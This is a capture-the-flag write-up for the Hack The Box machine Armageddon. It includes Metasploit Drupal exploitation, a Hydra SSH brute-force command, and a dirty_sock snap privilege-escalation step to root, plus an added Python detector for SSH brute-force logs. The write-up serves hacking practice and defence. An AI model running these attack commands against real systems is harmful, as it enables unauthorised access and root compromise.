I just started to make notes of my machine/box completions for write-up publishing recently, and I really started to enjoy doing it. The majority of the completed write-ups are for still-active machines, which means I am unfortunately not allowed to upload the write-ups as of yet.
Welcome to my writeup for Armageddon.HTB.
First we start with some basic enumeration.
Nmap
sudo nmap -sC -sV -O -A 10.10.10.233 -v
-sC: Scan with default NSE scripts. Considered useful for discovery and safe.
-sV: Attempts to determine the version of the service running on the port.
-O: Remote OS detection using TCP/IP stack fingerprinting.
-A: Enables OS detection, version detection, script scanning, and traceroute.
-v: Increase the verbosity level (use -vv or more for greater effect).
https://www.stationx.net/nmap-cheat-sheet/
Looking at the ports we see that ports 22 and 80 are open.
Port 22 we can use for SSH so let’s take a note of that.
Port 80 tells us there is a page so let us explore that.
As you can see below, it is just a plain webpage with a login feature.
Gobuster
I have a feeling we might get more loot if we brute force for directories.
Gobuster is perfect for that!
sudo gobuster dir -u http://10.10.10.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
-u: URL
-w: wordlist
-x: file extension
A lot of good hits, but on further inspection no info of value for our purpose. The only info of worth we found was a version file of the CMS the website is running:
Metasploit
Let us try a Metasploit exploit, we are looking for Drupal 7.
search drupal 7
We will be using number 1:
use 1
I got stuck, but then remembered the meterpreter commands. So I played with those and used them to upload LinPEAS.
meterpreter > upload linpeas.sh
In the LinPEAS output, I found the username: bxxxxxxxxxxxxxxx
I ran that through Hydra and got the password for SSH.
Hydra
hydra -f -l bxxxxxxxxxxxxxxx -P /usr/share/wordlists/rockyou.txt 10.10.10.233 -t 4 ssh
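A brute force like the one above leaves a dense trail of "Failed password" lines in the target's sshd log. As an added defensive example (not part of the original write-up), here is a small Python detector that parses OpenSSH auth lines, flags any (source IP, user) pair with a burst of failures inside a sliding window, and notes whether a successful login followed the burst. The log lines are constructed, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_YEAR = 2021  # assumption: syslog lines carry no year, so one is supplied here

# OpenSSH password-auth lines as written to /var/log/secure (CentOS) or auth.log (Debian).
SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_auth(lines):
    """Yield (timestamp, result, user, ip) for every password-auth line; skip the rest."""
    for line in lines:
        m = SSH_RE.match(line.strip())
        if m:
            ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {(ip, user): {"failures": n, "success_after": bool}} for pairs with at
    least `threshold` failures inside any `window_seconds` span."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in parse_auth(lines):
        (failures if result == "Failed" else successes)[(ip, user)].append(ts)
    hits = {}
    for key, stamps in failures.items():
        stamps.sort()
        # sliding window: size of the densest burst starting at each failure
        best = max(
            sum(1 for t in stamps[i:] if (t - start).total_seconds() <= window_seconds)
            for i, start in enumerate(stamps)
        )
        if best >= threshold:
            last_fail = stamps[-1]
            # a success after the burst is the case an analyst must triage first
            hits[key] = {
                "failures": best,
                "success_after": any(s >= last_fail for s in successes.get(key, [])),
            }
    return hits

# Constructed sample (not a real capture): a burst from one source ending in a
# successful login, plus one unrelated single failure that must not be flagged.
SAMPLE_LOG = [
    "Apr  3 10:15:01 armageddon sshd[2101]: Failed password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50122 ssh2",
    "Apr  3 10:15:02 armageddon sshd[2103]: Failed password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50124 ssh2",
    "Apr  3 10:15:02 armageddon sshd[2104]: Failed password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50125 ssh2",
    "Apr  3 10:15:03 armageddon sshd[2106]: Failed password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50127 ssh2",
    "Apr  3 10:15:04 armageddon sshd[2107]: Failed password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50128 ssh2",
    "Apr  3 10:15:05 armageddon sshd[2109]: Accepted password for bxxxxxxxxxxxxxxx from 10.10.14.5 port 50130 ssh2",
    "Apr  3 11:40:00 armageddon sshd[2300]: Failed password for invalid user admin from 10.10.14.9 port 41000 ssh2",
]
```

Running `detect_bruteforce(SAMPLE_LOG)` on the constructed lines flags only the 10.10.14.5 source, with five failures and a success after the burst.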
I guess it is time to SSH in!
And we are in!
Userflag in the pocket!
Now, when I run the sudo -l command, I see I can use snap install.
Now we need to figure out what to install to escalate to root. Next, on the attacker machine, run the command:
python2 -c 'print "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" + "A"*4256 + "=="' | base64 -d > lol.snap
We took this piece of code from an exploit for an older version of snap and repurposed it for our needs on this version. Google: dirty_sock.
Now let’s install the lol.snap we just made.
sudo /usr/bin/snap install --devmode lol.snap
Now let’s log in to our new user with root privileges!
su dirty_sock
WE ARE ROOT!